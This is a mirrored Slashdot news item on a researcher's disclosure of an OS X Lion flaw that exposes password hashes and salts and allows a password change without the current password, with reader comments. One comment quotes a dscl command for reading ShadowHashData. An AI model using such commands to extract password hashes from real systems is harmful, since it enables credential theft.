Slashdot Mirror

← Back to Stories (view on slashdot.org)

Aussie Researcher Cracks OS X Lion Passwords

Posted by samzenpus on from the all-your-passwords-are-belong-to-me dept.

daria42 writes "Thought your Mac was secure running Apple's latest operating system? Think again. Turns out that in some respects Lion is actually less secure than previous version of Mac OS X, due to some permission-tweaking by Apple that has opened up a way for an attacker to crack your password on your Lion box. The flaw was discovered by an Australian researcher who has previously published a guide to cracking Mac OS X passwords. Sounds like Apple had better get a patch out for this."

4 of 165 comments (clear)

  1. Here's the full details. by Core+Condor · · Score: 5, Informative

    http://www.techgineering.org/2011/09/22/2489/a-new-exploit-in-os-x-lion-allows-unauthorized-access-to-users-to-change-password/ - A New Exploit in OS X Lion Allows Unauthorized Access To Users to Change Password

  2. Re:Not really cracking the passwords. by CaptainJeff · · Score: 5, Interesting

    Most common approach to password cracking = brute force, targeting the specific hash (with the specific salt) of the account you're trying to crack. Step one of such an attack = determining the hash and salt that you're targeting. Which is what he figured out. If he's now bruteforcing those hashes, then he absolutely is cracking the passwords (well, he's trying to anyway).

    But your basic point is right...he's figured out a way to capture hash/salt data, which he still should not be able to do. Since Lion uses SHA-256 hashes for its shadow file, that cracking attempt is still going to be quite difficult.

    The more important part of this article is that under some circumstances, you can change the password of the logged in user without entering the current password. Now, *that* is a big deal (the degree of which is subject to valid debate).

  3. Re:Extremely Serious by RyuuzakiTetsuya · · Score: 5, Funny

    Worst?! XP had that flaw that let you install Vista.

    --
    Non impediti ratione cogitationus.
  4. While it's possible... by Anonymous Coward · · Score: 5, Interesting

    Either it's already been patched, as I'm running the developer builds of 10.7.2, or there's an issue in his particular setup vs. a normal install that's allowing this to happen.

    Stepping through the information on his own blog at: http://www.defenceindepth.net/2011/09/cracking-os-x-lion-passwords.html

    When performing his "dscl localhost -read /Search/Users/" I do NOT get the dsAttrTypeNative:ShadowHashData result UNLESS I have root privileges through sudo. Not even for my own user.